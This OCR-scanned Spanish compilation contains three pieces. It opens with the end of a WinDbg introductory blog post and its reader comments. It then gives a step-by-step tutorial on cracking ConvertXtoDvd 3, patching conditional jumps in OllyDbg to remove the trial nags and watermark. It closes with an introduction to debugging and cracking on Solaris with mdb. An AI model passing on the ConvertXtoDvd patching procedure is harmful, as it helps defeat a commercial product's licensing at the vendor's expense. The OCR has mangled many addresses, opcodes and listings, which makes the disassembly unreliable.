USER32!DialogBoxIndirectParamAorW+0x58 
00000000" 0010f6e0 000007fe'fe623d2e USER32!DialogBoxIndirectParamwW+0x18 
00000000*0010f720 00000000 FFfe5146 COMDLG32!CFileO0penSave: :Show+0x143 
00000000 *0010f790 00000000" FfFfe547e notepad!Show0penSaveDialog+0xde 
00000000" 0010f800 00000000 FFFe5b98 notepad!Invoke0penDialog+0x136 
00000000 0010f860 00000000" FFfFe6d33 notepad!NPCommand+0x380 
00000000 "0010f990 00000000*7796e25a notepad!NPWndProc+0x55b 
00000000" 0010f9e0 00000000 7796cbaf USER32!UserCallWinProcCheckwWow+0x1lad 
00000000" 0010faa0 00000000*7796cdcd USER32!DispatchClientMessage+0xc3 


(be) 


Ahora, a diferencia de cuando los símbolos no estaban cargados, podemos ver mucha mas 
información en la pila de llamadas, como los nombres de los métodos del módulo de 
notepad que antes no veíamos. Podemos ver que este hilo en cuestión invoca la ventana 
para abrir o guardar un fichero, mediante las llamadas a InvokeOpenDialog en notepad, y 
posteriormente la llamada al método Show de un CFileOpenSave en el modulo 
COMDLG232, que a su vez llama a... no sigo, que creo que se entiende suficientemente bien 
y ya me voy cansando :) 


En fin, con esto hemos dado un repaso general a WinDbg, aunque no hemos hecho nada 
mas que rascar la superficie. No os preocupéis por los comandos, por las pilas de llamadas 
ni por nada mas, lo iremos viendo con calma en los siguientes posts (¡si es que os 
interesan!). Me conformo por ahora con que hayáis podido abrir el WinDbg, adjuntaros a 
un proceso y comprendido la importancia de los símbolos. 


Conclusiones: 


En este post hemos comentado las herramientas principales que vamos a emplear, hemos 
hablado de los símbolos y hemos realizado nuestra primera sesión de depuración con 
WinDbg: no esta mal. Pero venga... se que lo estáis pensando. A no ser que seáis muy 
apasionados del bajo nivel, o que tengáis mucho tiempo libre, os estaréis preguntando ¿Para 
que quiero yo saber todo esto? Pues allá van algunas razones que considero que pueden 
justificar el pelearse con el WinDbg: 


+. Si nuestro sistema nos muestra una pantalla azul de la muerte, podemos tratar de 
analizar el minidump (volcado de memoria de pequeñas dimensiones) que nos 
genera con WinDbg para determinar que módulo fue el causante del error. Así 
podemos determinar si el problema se originó en el controlador de disco, de vídeo, 
en el propio kernel, etc. 

+. Ciertas aplicaciones, como SQL Server, generan volcados de memoria cuando 
suceden eventos inesperados, errores, etc. Mediante WinDbg podemos intentar 
acercarnos al origen del problema, aunque sin los símbolos apropiados (y estos 
símbolos son, generalmente, privados) será muy dificil profundizar en la 
investigación. No obstante, al menos tendremos cierto conocimiento de como 
capturar volcados, que nos facilitará la tarea de colaborar con los servicios de 
soporte de Microsoft. 

+ Jugando con WinDbg aumentamos notablemente nuestro conocimiento de la 
plataforma sobre la que trabajamos, lo cual siempre es positivo. De echo, esta es la 
razón que personalmente mas me motiva y por la que sigo jugando siempre que 
puedo con depuradores :) 

+  Tuúltima sesión de depuración siempre es un buen tema de conversación para esos 
ratos de cervezas con los colegas... XD 


Rock Tip: 


Como el artículo de hoy es tan solo una pequeña introducción a lo que espero que sea una 
serie de artículos sobre WinDbg y depuración en general, el tema 'Teaser', de Yngwie J. 
Malmsteen, me viene que ni pintado. 


Para los que no le conozcáis, el señor Malmsteen es uno de los guitar heroes más 
conocidos, un virtuoso de corte neoclásico con igual número de seguidores que de 
detractores (los detractores son por pura envidia cochina xD). Si bien no es mi guitarrista 
favorito, he de admitir que sus discos mas ochenteros me llegan al alma. Dentro de este 
estilo os recomendaría especialmente el Eclipse (NOTA: Este link NO lleva a ningún IDE 
extraño... ¡¡siempre seré fiel a mi Visual Studio!!). 


Posted: 3/1/2008 13:28 por Pablo Alvarez | con 19 comment(s) | 
Archivado en: Win32,WinDbg 


Comentarios 


Seraphinux ha opinado: 


Chavo casi me sacas las lagrimas... recuerdas el WinDasm327... o los tutoriales de +ORC o 
de Estado +Porcino... 


Este articulo esta genial y espero con ansias los demas. De mientras agregado al blog 
xDDD 


Saludos Atte. Seraphinux 

4 January 4, 2008 9:36 AM 
Augusto Ruiz ha opinado: 
Ese Pablo!!! 


Por favor, sigue con esta serie, WinDBG es la herramienta que me apetece conocer en 
profundidad y que siempre se me ha resistido!!! 


¿Algún enlace recomendable para empaparse del WinDBG? 
+ January 4, 2008 10:09 AM 


Jorge Serrano ha opinado: 


Joer, que recuerdos el WinDasm32 como dice Seraphinux... y ahora, a animarme a tope con 
el WinDbg gracias a tí Pablete. 


Muchas gracias por la información y espero que sigas compartiendo con nosotros entradas 
de una calidad tan alta como esta. :-) 


¡Felicidades por el artículo! 

Pedazo friki que estás hecho. 

ff January 4, 2008 10:29 AM 

Rodrigo Corral ha opinado: 

Brutal, Pablo, brutal... me apunto a esta serie!!! 

ff January 4, 2008 10:32 AM 

Cristina González ha opinado: 

XDD que bueno. En el próximo post... ¿vamos a crackear el buscaminas? :D 


ff January 4, 2008 11:18 AM 


Pablo Alvarez ha opinado: 


Hey! No creía que esta serie tan friki pudiera ser tan bien recibida... !gracias a todos por los 
comentarios! 


Respecto al buscaminas... llevo mas de un año con ese post pendiente, y me da pena 
escribirlo y quedarme sin objetivos en la vida... Mmm, quizá debería saltarmelo :P Ahora 


en serio, el proximo seguramente le toque a SQL.. pero prontito, muy prontito! 


Mientras tanto podeis aprovechar lo poquito que hemos visto en este post para adjuntaros al 
proceso del buscaminas y ver que encontrais! 


ff January 4, 2008 11:37 AM 

Marco Amoedo ha opinado: 

Hola Pablo! 

Por supuesto que me apunto a la serie. Quiero hacer nuevos records con el buscaminas :) 
Eso si, siempre negare haber participado en una sesion de depuracion de buscaminas a las 
2am jejeje 

Un abrazo 

+ January 4, 2008 1:00 PM 


Gaussepic ha opinado: 


Pues si queréis un pedazo de blog de depuración aquí lo tenéis 
blogs.msdn.com/.../default. aspx 


ff January 4, 2008 5:14 PM 


David Daniel Arroyo Zari "Ddaz" ha opinado: 


muy buenos recuerdos vinieron a mi mente... hasta sobre el WinDasm32 y otros... los 
cuales una que otra vez aun utilizo jeje... 


Salu2 
Ddaz 
+ January 5, 2008 12:41 AM 


Pablo Alvarez ha opinado: 


Gaussepic, el blog de Tess es impresionante! Aun recuerdo cuando se paso unos dias por la 
oficina de Microsoft aqui en Madrid :) 


Por supuesto que aprendi muchisimo de ella, su blog es de lo mejor para depuración de 
código administrado con WinDbg + SOS! 


Gracias por el apunte! 

ff January 5, 2008 1:44 AM 

HardBit ha opinado: 

Muy bueno los temas! 

Voy siguiendo los posts y a ver si despues nos metemos con el icesoft :D 
4 January 8, 2008 5:33 PM 

Alberto ha opinado: 


Por Tutatis, sí que está interesante el artículo, pero ni sueñes hablar de tu última sesión de 
depuración cuando tomemos esas cervezas. 


+ January 9, 2008 4:51 PM 
juliug ha opinado: 
Está muy bien el artículo. 


Windbg es impresionante porque puedes debuggear a nivel de ring0 como bien dices, sin 
embargo, para debuggear a nivel de ring3 el mejor debugger, sin lugar a dudas es: 


OllyDBG -> http: //www.ollydbg.de/ 


+ January 11, 2008 11:16 PM 
Pablo Alvarez ha opinado: 
¡Gracias por el comentario, juliug! 


La verdad es que no comparto mucho tu opinion; si bien OllyDBG esta GENIAL para 
depurar en modo usuario (y de hecho, aprendi mucho jugando con el y ahora estoy 
siguiendo la version 2.0, que aunque aun tiene poca funcionalidad promete mucho) no creo 
que sea el mejor debugger de modo usuario; al menos no para todos los escenarios, 
principalmente por su falta de extensibilidad mediante modulos. 


Y para que no me digan nuevamente que defiendo los productos de Microsoft por encima 
de todo, dejare claro también que para depurar en modo kernel WinDbg NO es mi favorito 
(SoftICE en *casi* todos los escenarios de depuracion de kernel me gusta mas). 


Si os gusta jugar con depuradores y descubrir cosas nuevas, desde luego OllyDBG es una 
opcion a tener en cuenta (y gratuita!). También recomiendo echar un ojo al Syser (teorico 
reemplazo de SoftICE) y al Rasta Ring 0 Debugger, un depurador libre open-source muy 
interesante. 


4 January 11, 2008 11:43 PM 
IDEAFIX ha opinado: 


Ando en busqueda del SoftICE si alguien sabe una direccion de donde bajarlo se los 
agradeceria mucho, lo necesito para aprender a manejarlo. 


Gracias 
ff January 19, 2008 9:03 PM 
Pablo Alvarez ha opinado: 


IDEAFIX, lamentablemente no te puedo decir un lugar de donde bajarte el Softlce, ya que 
se trata (trataba, más bien) de un software comercial. No obstante, como comentaba en el 
post, tienes otras alternativas como OllyDbg (gratuito) y Syser, que digamos que es su 
'heredero espiritual', del cual dispones de una version de trial en su pagina web 
(www.sysersoft.com). 


En definitiva, te recomiendo que te muevas a otro depurador porque SoftICE esta 
descontinuado desde 2006, y sin soporte desde 2007. 


Espero que mi información te haya servido de ayuda, aunque lamentablemente no puedo 
responderte a tu pregunta original ya que, una vez mas, SoftICE es/era un software 


comercial. 


Un saludo! 


Crackeando ConvertXtoDvd 3 


Hola a todos, bueno acá estoy con mi segundo tutorial, en esta ocasión con el ConvertXtoDvd 
en su versión 3, un muy buen programa con el que puedes hacer DVDs partiendo de cualquier 
archivo de video, además de agregar subtítulos y menús, todo desde una interfaz sencilla e 
intuitiva. En este tutorial no me dedicare a buscar serial, ya que hay varios keygens dando 
vueltas por la red, lo que haremos será eliminar las nags de entrada y salida y la marca de agua 
que pone en cada DVD 


Analizamos el programa con PEiD y nos dice que está hecho con Delphi 6.0, para nuestra 
suerte sin ninguna protección. 


[ZA PEiD v0.94 


File: | C:Program Files|VSO|ConvertX|3(ConvertXtoDvd.exe 


Entrypoint: | DO3EC6DC EP Section: | itext 
File Offset: [003EB2DC First Bytes: [55,8B,EC,83 


Linker Info: [2,25 Subsystem: |Win32 GUI 


Borland Delphi 6.0 - 7.0 [Overlay] 


Empecemos: 


Ejecutamos el programa y nos sale una Nag que nos dice que por favor registremos nuestra 
copia del programa, y nos muestra todas las limitaciones del programa, incluida una marca de 
agua. 
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ConvertXtoDVD 3,1.0.26 


ConvertXtoDVD 3 
Trial version 


Click here if 


Benefits of registered customers: 


Convert videos without demo message 

Use ConvertXtoDVD without registration reminder dialogs 
Receive one year of free upgrade protection 
Download extra menu templates 

Get priority technical support 


Jugamos con el programa un poco, convertimos algún video que tengamos por ahí, y vemos 
que nos sale una nag diciendo que esta es una versión de prueba, además de ponemos una 
marca de agua en nuestro video que dice “Comprar una llave de desbloqueo.... Blablabla”. 


ConvertXtoDVD 


E This is a trial version ! 


You are using a trial version of this software. 
A watermark will be inserted in the middle of the picture. 
Registered version doesn't add this message. 


ConvertXtoDvd v3.1.0.26 by KJD 


BG: 


OLLYD 


Cargamos el programa en olly, buscamos indicios de la primera nag, veamos que hay en 
“All referenced text string” , echamos un vistazo y observamos que aparecen varias strings 
interesantes. Bueno vamos por la primera nag. 


Vamos a buscar en “All referenced text string”, algún texto referido a nuestra nag, por ejemplo 
el texto “Trial Version”, vemos que hay varias strings. 


BO7RAASEC|ASCII "swscale.dll”,0 
BO7AA40B|ASCII "postproc.dll”,6 
BO7AA434|MOU EDX, ConvertX. BO7AASES 
BO7AA463| MOV EDX, ConvertX. BO7AASFS 
DO7AR4AS | MOV EDX, Convertx. BO7ARGOC 
BO7AR4ES| MOV EAX, ConvertxX. BO7ARGSC 
BO7AASOF | MOU EAX, ConvertX. B07ARG54 
BO7AAS45| MOV EDX, ConvertX. BO7ARG64 
BO7AAS69| MOV EDX, ConvertX. B07AAGS4 
BO7AASES|UNICODE "File”, 0 


BO7CSC6B|UNICODE "bled)”,a 
BO7CSE62| MOV EDX, ConvertxX. BO7CSFSC 
BO7CSES7|MOU EAX, ConvertxX.BB7CSF7C 
BO7CSESS| PUSH Convertx. B07CSF90 
BO7CSE6B| PUSH Convertx.B07CSFCO 
DO7CSE6S| MOU EDX, Convertx. B87CSFDC 
BO7CSE7B|PUSH Convertx. BB7CSFFC 
DO7CSEFS|MOU EDX, ConvertxX. BB7CSFSC 


Ba7DS77a 
BO7DSS7TA 
BO7DSSDF 
BO7DS9C7? 
BO7DS9E? 
BO7DSAGB 
BO7DSASB 
BO7DSBS2 
BO7DSB72 
Ba7DSsc13 
Ba7DsCc29 
BO7DSC34 
BO7DSC4A 
BO7DSCES 


BB7DCD64 
BB7DCDAG 
BB7DCOFO 
BB7DCES6 
BO7DCER4 
BO7DCEAF 
BB7DCEB? 
BB7DCECA 
BB7DCF4F 
BOB7DCFS3 
BOB7DCFEF 


UNICODE "d”,a 

MOU EDX, ConvertX. 200707074 
MOU EDX, ConvertX.007D70B9 
MOU EDX, ConvertX.B97D78DC 
MOU EDX, ConvertX.B907D715C 
MOU EDX, Convertx.B07D71DC 
MOU EDX, ConvertX.B07D7268 
MOU EDX, ConvertX.B07D7309 
MOU EDX, ConvertX.B07D736€ 
MOU EDX, Convertx. 80707308 
PUSH ConvertX.B07D7420 
MOU EDX, ConvertX. 08707430 
PUSH ConvertX. 40707420 
MOU EDX, Convert X.B07D74B8 


UNICODE "n %s”,a 

MOU EDX, Convert X. 887DD04C 
MOU EAX, ConvertX. 08700069 
MOU EAX, ConvertX. A087DD0A9 
PUSH ConvertX.B070D0B4 
PUSH ConvertX. 007DD0E4 
MOU EDX, ConvertX. 087DD199 
PUSH ConvertX.B07D0D120 
MOU EDX, Convert Xx. B87DD004C 
MOU EDX, Convert Xx. 687001909 
MOU EAX, ConvertX. B87DD0A9 


UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 
UNICODE 


UNICODE "Fi le” 

UNICODE "Version" 

UNICODE "Trial version” 

ASCII "USO-Software” 

ASCII "USO" 

ASCII "http: /4www.Wso-software. fr” 
UNICODE "Registered version” 


ASCII "LicensekKey” 

ASCII "USO-Software” 

UNICODE "<P align="center”><b>” 
UNICODE ” 3<b><br>” 

UNICODE "Trial version” 
UNICODE "<P>" 

ASCII "LicensekKey” 


"User requested cancel lation” 

"Cancelling burn...” 

"The titleset %d doesn't have an enabled video str 
"Each titleset must contain at least one enabled u 
"The titleset X%d is incomplete. A least one merged 
"Complete the titleset with the file merger before 
"There is not enough free space left in folder "%s 
"Make sure this drive has at least %s free.” 

"Wou are using a trial version of this software.” 
Ebro 

"A watermark will be inserted in the middle of the 
"ábr>” 

"Registered version doesn't add this message.” 


ASCII "LicensekKey” 

ASCII "http: “www. vso-software.fr/pirated_key.php” 
ASCII ”USO-Software” 

UNICODE "<P align="center”><b>” 

UNICODE ” 3<-b><br>” 

UNICODE "Trial version” 

UNICODE "<P>" 

ASCII "LicensekKey” 

UNICODE "Trial version” 

ASCII "USO-Software” 


Como vemos tenemos varias strings interesantes, en concreto 4 que son las que puse más 
arriba. Les ponemos un BP en cada una de ellas y corremos el programa. 


Vemos que olly para en ODO7DCEB7, esta es la rutina de la primera nag y ultima nag, ya que 


ambas se generan en esta rutina, bajamos un poco y vemos otro BP en 007DCF83 que es parte 


de la segunda nag, la de salida, vemos unas instrucciones más abajo del BP, un gran salto 
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proveniente de 007DCE2A , sacamos ambos BP y colocamos uno en este jmp y en el inicio de 


la rutina. 
[515] DB 68 
$ 55 PUSH EBP 
. 8BEC MOU EBP,ESP 
. B9 08090909 |MOU ECX,8 
o > 6A 08 PUSH 0 
a . 6A00 PUSH a 
o . 49 DEC ECX 
E .? 75 F9 JNZ SHORT ConvertX. 887DCD78 
o . 53 PUSH EBX 
o . 56 PUSH ESI 
o . SBFO MOU ESI,EAX 
o . 3300 XOR EAX, EAX 
o . ES PUSH EBP 
o . 68 37D07D09 |PUSH 
o . 64:FF39 PUSH DWORD PTR FS: CEAX] 
. 64:8920 MOU DWORD PTR FS: CEAXJ,ESP 
. 0686 75070001 MOU BYTE PTR DS: [ESI+7751,1 
907 |. 6301 MOU BL, 1 
oO7DCosA||. 8045 E4 LEA EAX, DWORD PTR SS: [EBP-1C] 
BO7DCD9D|].. 50 PUSH EAX Argi 
SO7DCD9E||. 3309 XOR ECX, ECX 
7 . BA 4CD97D09 |MOU EDX, ConvertX.807DDB4C ASCII "LicensekKey” 
. 8886 18040001 MOU EAX,DWORD PTR DS: [ESI+418] 
. ES ASFEFSFF | CALL ConvertX. 9710058 
. 8B5S E4 MOV EDX, 


Ctrl+F2, F9 y olly para en el inicio de la rutina, empezamos a tracear con F8 hasta llegar a 
007DCDC5 


UU/ULUBB|| > 8B45 FU MuUv EHX, 
GB7DCDBE||. 33D2 XOR EDX,EDX 
BO7DCoca||. ES F394C2FF 
«(724 ?F 
8D45 ES LEA EAX, 
50 
8D45 EN 
8B55 FC 
ES 6ASCCc2FF 
8B45 En 
8D4D Fa 
8D5S5 F4 
ES F4AAFCFF 
84ca TEST AL, AL 
v| 74 SE 
. |837D Fa 67 crap 
.v| 75 41 
8B55 FO MOU EDX, 
8B45 F4 MOU EAX, 
ES F3BBFCFF 
84ca TEST AL,AL 
.v| 74 BC 
B3 60007009 || MOU EAX, ASCII "http: /“www.vso-software.fr/pirated_key.php” 
ES S115CBFF 
.«v| EB 57 
> |C686 75070001] MOU BYTE PTR DS: [ESI+7751,0 
BA 28A68000 || MOU EDX, 
B9 sob0BB0a || mMOU ECX,S0 
8B86 FCa60001 | MOU EAX, DWORD PTR DS: [ESI+6FCI 
eb1s MOU EBX, DWORD PTR DS: [EAXJ 
FF93 80000090 CALL DWORD PTR DS: [EBX+8C] 
84ca TEST AL,AL 
.v| E9 76010000 
> |837D Fa 62 crap .2 
wl 75 28 JNZ 


Inmediatamente advertimos una string que tiene una url hacia el web del programador, vemos 
que nos dirá???, copiamos la string en el navegador y vemos...... 


ConvertXtoDvd v3.1.0.26 by KJD 


Nos lleva a la web del programador y nos dice : 


Hemos detectado que estas intentando utilizar una llave de licencia pirata. 


Si quieres desbloquear el software, tienes que comprar una licencia 
valido de nuestra tienda online 


Ósea, mejor no parar por aquí, bueno estábamos en 0O7DCDC5, vemos un salto hacia 
007DCE46, cosa que no queremos porque nos pasamos de largo nuestro ¡mp hacia la zona 
libre de nag, jejee. Aquí podemos hacer dos cosas: 


12. Vamos a forzar al programa para que vaya al jmp que nos salvara de nuestra nag, 
noppeamos este JE para que no salte, y seguimos traceando con F8. Vemos que tenemos otro 
salto en OO7DCDE6 que nos obvia nuestro jmp, también lo noopeamos, a continuación 
tenemos un CMP y otro salto que nos lleva a donde no queremos, también lo noopeamos y 
traceamos hasta llegar por fin a nuestro JMP que nos salva de la nag. 


22, Nuestro JMP que nos salva de la nag se dirige a OO7DCFAS, por lo que podemos cambiar el 
primer JE (007DCDC5) para que salte a OO7DCFA5 entonces cambiamos JE SHORT 
ConvertX.007DCE46 por JMP 007DCFA5, por lo que siempre salteara la creación de la nag. 


Sea como sea que hagan, salven los datos cambiados y ejecuten el programa, verán que no hay 
más nags. Cargamos el ejecutable en olly y vamos a ver como sacamos la molesta marca de 
agua. 


La Marca: 


La verdad no se para que hacen programas de edición de video si al final tu creación tiene una 
horrible marca de agua cubriendo toda la maldita pantalla!!!!..... Mejor me calmo un poco....... 
Jejejeje, bueno, verán que es más sencillo de lo que piensan. 


En el programa cuando le damos al Botón “Convert”, nos aparece otra nag diciéndonos que 
este es un trial, si como si no lo supiéramos. Volvamos a “All referenced text string” y 
busquemos algo referido esta nag por ejemplo “You are using a trial version of this software" y 
le ponemos un BP. 


Damos F9 y convertimos algún video, y olly para aquí. 


ConvertXtoDvd v3.1.0.26 by KJD 


ob1> rimpoun 
ES A4B1DDFF 
E9 71130000 
S0BE 75070001 CMP BYTE PTR DS: [ESI+7751,0 
oFe4 c2000001 JE 

3309 XOR ECX, ECX 

B2 B1 MOU DL, 1 

8886 DCO6890l MOU EAX, DWORD PTR DS: CESI+6DC] 
ES F312FEFF 
8D8D 74FFFFFÍ LEA ECX, 
BA C8737D99 MOV EDX, 
8B86 30049091 MOU EAX, DWORD PTR DS: [ESI+430] 
ES A9EZEBFF 
FFBS 74FFFFFÍ PUSH 
68 20747088 [PUSH 
8D8D 7OFFFFFÍ LEA ECX, 
BA 30747099 |M0U EDX, 
8886 30040001 M0U EAX, DWORD PTR DS: [ESI+43C] 
ES 88E2EBFF 
FFBS 7OFFFFFÍ PUSH 
68 20747D98 |PUSH 
8D8D 6CFFFFFÍ LEA ECX, 
BA B3747D99 |MOU EDX, 
8B86 30040001 MOU EAX, DWORD PTR DS: [ESI+430] 
ES 67E2EBFF 
FFES 6CFFFFFÍ PUSH 
68 20747099 | PUSH 
8D85 78FFFFFÍ LEA EAX, 
BA 06000098 |MOU EDX,6 
ES FOBSC3FF 


ODQC ?OCCCCCÍ MM nv 


HUY CUA) UWURO FIN UD LOUHOr + 


UNICODE "You are using a trial version of this software.” 


UNICODE "<br>" 


UNICODE "A watermark will be inserted in the middle of the 


UNICODE "<br>" 


UNICODE "Registered version doesn't add this message.” 


UNICODE "<br>" 


Vemos que un poco más arriba del BP hay un gran salto que nos saltea la rutina de generación 
de la nag y la de la marca de agua. Ponemos un BP en 007D5BF8, Ctrl+F2 y luego F9, 
convertimos algún video y olly para en el salto, lo cambiamos a JMP y el programa empieza a 
convertir el video, esperamos a que termine y lo miramos. Vemos que el video no tiene 


Guardamos todas las modificaciones hechas y ya tenemos nuestro programa totalmente 
funcional. 


Conclusiones: 


En definitiva un muy buen programa totalmente descuidado, que aprendimos con esto??? Que 
si te has tomado el tiempo de hacer un buen programa, tomate 5 minutos en protegerlo un 
poco. Saludos a todos los principiantes como yo que recién empieza con esto y suerte para los 
próximos proyectos. 


ConvertXtoDvd v3.1.0.26 by KJD 


Cracking en Solaris Parte I 


Introduccion: 


Despues de un tiempo sin escribir nada me decidi a escribir esto, no se que saldra, ya veremos. 
Pero la idea es ver un poco sobre cracking en solaris. 


Que es solaris? 


Pues es un sistema operativo unix-like de la empresa sun, muy conocido en el ambito de servers, corriendo 
especialmente sobre plataformas SPARC. Tambien tiene su version para 1386, que es sobre la que se basara 
este tutorial. (http://es.wikipedia.org/wik1/Solaris_(sistema_operativo)) 

No esta muy difundido como OS de escritorio pero la verdad que anda bastante bien, tiene todos los 
programas que vienen con linux, como firefox por ejemplo y hasta tiene un manejador de paquetes. 


Donde lo consigo: 


http://www.sun.com/software/solaris/get.jsp++download 
http://www.opensolaris.com/get/index.jsp 


Yo usare la segunda opcion, el OpenSolaris instalado en un vmware. 


Conociendo el debugger: 
Pues como siempre necesitaremos un debugger, en este caso usare el terrible mdb. 


OpenSolaris viene con Gnome instalado por default, asi que para los usuarios de linux 

les sera exactamente igual, para los que no conozcan gnome, den ALT+F2 y ejecuten el comando “gnome- 
terminal”. Eso abrira una consola en ella tipeamos “mdb” y ali veremos el lindo debugger que nos presenta 
solaris. 


damian(Dopensolaris:-$ mdb 
> 


Ese es el prompt del debugger en que pondremos los comandos que necesitemos, como setear un breakpoint, 
decirle al proceso que continue, etc, todas las opciones que tienen los debuggers. 


Los comandos se especifican de dos formas, una con el nombre completo de comando y otra sola la letra 
inicial (similar a gdb) pero con la diferencia que si usas la palabra completa debe empezar con "::” sino solo 


con : 


Un ejemplo para el comando help: 
> ::help 


Eso nos mostrara una ayuda basica sobre el debugger. 


Bien, vamos a attacharnos a cualquier programa y ver un poco los comandos que nos serviran para cuando 
ataquemos a nuestra victima. 


Salgo del debugger con ::quit y vuelvo a la consola. Ejecuto firefox y lo busco en la lista de procesos para 
poder attacharme: 


damian(Dopensolaris:-$ ps -A | grep firefox 
616 ? 0:00 firefox 


El pid del proceso es 616, con el comando mdb -p 616 nos attachamos y vemos: 
damian(Vopensolaris:-$ mdb -p 616 

Loading modules: [ ld.so.1 libc.so.1 ] 

> 


Si tuvieramos los simbolos veriamos como los carga, pero este no es el caso, pero vamos bien ya tenemos 
nuestro debugger attachado, ahora veremos como poner un breakpoint, ver los registros, ver el contenido de 
direcciones de memoria y por supuesto desensamblar, con eso nos bastara no? 


Estamos con el proceso detenido, para que continue debemos usar el comando ::cont o :c 
> ::cont 


Para detener el debugger damos CTRL +C 
mdb: target stopped at: 
libc.so.1*_ waitid+0x15:jae +0xa  <libc.so.1'  waitid+0x21> 


> 


Ahi tenemos el prompt de nuevo, ya podemos poner un bp, ver los registros o desensamblar. 
Para poner un breakpoint solo necesitamos el comando ”:b direccion” o sino “direccion::bp” 


Para ver los registros usamos ::regs 


> :Tegs 

%cs = 0x016b %eax = 0x0000006b 

%ds = 0x0173 %ebx = 0xd2b98000 

%ss = 0x0173 %ecx = 0x080472a0 

%es =0x0173 %edx = 0xd2b05€05 libc.so.1” waitid+0x15 
% ts = 0x0000 %esi = 0xd2b92a00 

%gs = 0x01c3 %edi = 0x0000000f 


%eip = 0xd2b05€05 libc.so.1*__ waitid+0x15 
%ebp = 0x080472c0 
%kesp = Oxdbc53fe4 


%eflags = 0x00000286 
1d=0 vip=0 vif=0 ac=0 vm=0 rf=0 nt=0 ¡op1=0x0 
status=<of df IF tf SF, z£ af,PF,cf> 


%esp = 0x080472a0 
%trapno = 0xd2a3e000 
%err = 0x0 

> 


Para desensamblar a partir de donde estemos parados: 

> ::dis 

libc.so.1*_ pollsys+0x15:  jb  -0x8040b <libc.so.1*_ cerror> 
libc.so.1”  pollsys+0x1b: ret 


0xd294540c: addb Y%al,(Veax) 

0xd2945408e: addb %al,(Veax) 

libc.so.1”__ pread: call +0x0  <libc.so.1*_ pread+5> 
libc.so.1”  pread+5: popl %edx 

libc.so.1”  pread+6: movl S$0xad,Y%eax 

libc.so.1*  pread+0xb: movil %esp,%ecx 

libc.so.1'  pread+0xd: addl $0x10,%edx 

libc.so.1*_ pread+0x13: sysenter 


libc.so.1*_ pread+0x15: jae +0xa  <libc.so.1”  pread+0x21> 
> 


Como vemos el desensamblado esta en sintaxis ATéT, nosotros estamos acostumbrados a la de intel, pero 
bueno es asm de todas formas xD. Existe una manera de cambiarlo pero a mi no me sirvio, al que lanzar el 
debugger con el parámetro —V 1a32, 


Para ver el dump de una zona de memoria usamos el comando ::dump 
> 0x08047440::dump 

V1234567 89ab cdef v123456789abcdef 
8047440: dc4a93d2 1808ca08 09000000 00000000 .J.............. 


Si no nos alcanza una linea y queremos mas (nota para cocainomanos xD) le especificamos la cantidad de 
bytes a mostrar 


> 0x08047440,100::dump 

V123 4567 89ab cdef vl123456789abcdef 
8047440: de4a93d2 1808ca08 09000000 00000000 .J.............. 
8047450: 00000000 00000000 ffFfFFFF 0OS09dd2 ................. 
8047460: esb60c08 00000000 dcb60c08 00809dd2 ................ 
8047470: 00000000 002a6dd2 00000000 b0740408 ..... Moni ko 
8047480: 92658fd2 1808ca08 09000000 00000000 .8.............. 
8047490: 00000000 2c8156d2 d8b60c08 98805642. ....,.V.......V. 
8047440: b8740408 52a493d2 dcb60c08 00000000 .t..R........... 
80474b0: fc740408 6b914dd2 1808ca08 09000000 .t..k.M......... 
80474c0: fffFfEFf 48880408 e8934108 988056d2 ....H.....A...V. 
804740: ec740408 52a493d2 50420808 1808ca08 .t..R...P....... 
80474e0: 09000000 40658fd2 088£56d2 048f56d2 ....(Me....V...V. 
8047410: FERRE EFREF7E FEFFFEFA 38750408 ............ 8u.. 
8047500: a4974dd2 d8b60c08 01000000 01000000 ..M............. 
8047510: 48880408 00000000 70a7bacd 48713742 H.......p...H.7. 
8047520: daa917d2 5caa0808 00000000 e8934108 ....l......... A. 
8047530: 70750408 f0934108 70750408 daa917d2 |u....A.fu...... 
> 


Cuando hacemos dump el simbolo V nos indica el inicio. 
Si queremos ver el call stack, simplemente tipeamos ::stack 


> stack 

libc.so.1*  pollsys+0x15(8ca0818, 9, 0, 0) 

libc.so.1*poll+0x52(8ca0818, 9, f£FFFFEF) 

libglib-2.0.50.0.1400.4'g main context_iterate+0x397(80cb6d8, 1, 1, 8048848) 
libglib-2.0.50.0.1400.4”g main loop run+0x1b8(84193e8) 
libgtk-x11-2.0.50.0.1200.3"gtk main+0xb2(8047800, 808686c, 81b0e68, 80475a8, cda84a6b, 81b4400) 
libwidget gtk2.so”_ 1cKnsAppShellDRun6M_I +0x34(81b4400) 
libtoolkitcomps.so"_ 1cMnsAppStartupDRunóM_I +0x2b(81b0e68) 
XRE_main+0x1bc6(5, 804786c, 8086840) 

main+0x25(5, 804786c, 8047884) 

_start+0x7a(5, 8047944, 80479c1, 80479cb, 80479d1, 8047980) 

> 


Algo que me olvidaba si necesitamos ayuda con algun comando en especial podremos usar la ayuda que nos 
da el debugger 


si tipeamos ::help comando 


Sigamos, tambien necesitamos hacer un step by step, (en olly usamos F7) aca se hace con :s O ::step 
8 

mdb: target stopped at: 

libc.so.1* pollsys+0x10a:  addl $0x10,%esp 


Vamos ejecutando linea a linea y viendo el desensamblado. 


Con eso ya podriamos empezar atacando un crackme que encontre en crackmes.de, es el unico para solaris 
que habia pero vamos a ver otro comando de solaris que nos puede llegar a servir de ayuda. 


El comando en cuestion es "truss”, nos mostrara las llamadas a sistema que haga un proceso: 
un ejemplo con el mismo proceso de firefox: 


damian(Dopensolaris:-$ truss -p 638 


/13:  Iwp park(0x00000000, 0) (sleeping...) 
PE Iwp_park(0x00000000, 0) (sleeping...) 
/6: Iwp_park(0x00000000, 0) (sleeping...) 
ESE Iwp_park(0x00000000, 0) (sleeping...) 
Er lIwp_park(0xCD96EES8, 0) (sleeping...) 


12: pollsys(0xCDE1EC70, 1, 0x00000000, 0x00000000) (sleeping...) 
ME pollsys(0x08CA0818, 9, 0x00000000, 0x00000000) (sleeping...) 
ele pollsys(0x08CA0818, 9, 0x00000000, 0x00000000) — =1 

/1: ioctl(4, FIONREAD, 0x0804740C) =( 

/1: read(4, "13 8 D ]E40EE002E40EE002".., 416) =416 

/1: pollsys(0x08CA0818, 8, 0x080474A8, 0x00000000) =0 

/1: Iwp_unpark(3) =0 

/1: pollsys(0x08CA0818, 8, 0x080474A8, 0x00000000)  =0 

/1: pollsys(0x08CA0818, 8, 0x080474A8, 0x00000000)  = 

/1: pollsys(0x08CA0818, 8, 0x080474A8, 0x00000000)  =0 

le pollsys(0x08CA0818, 8, 0x080474A8, 0x00000000) =0 
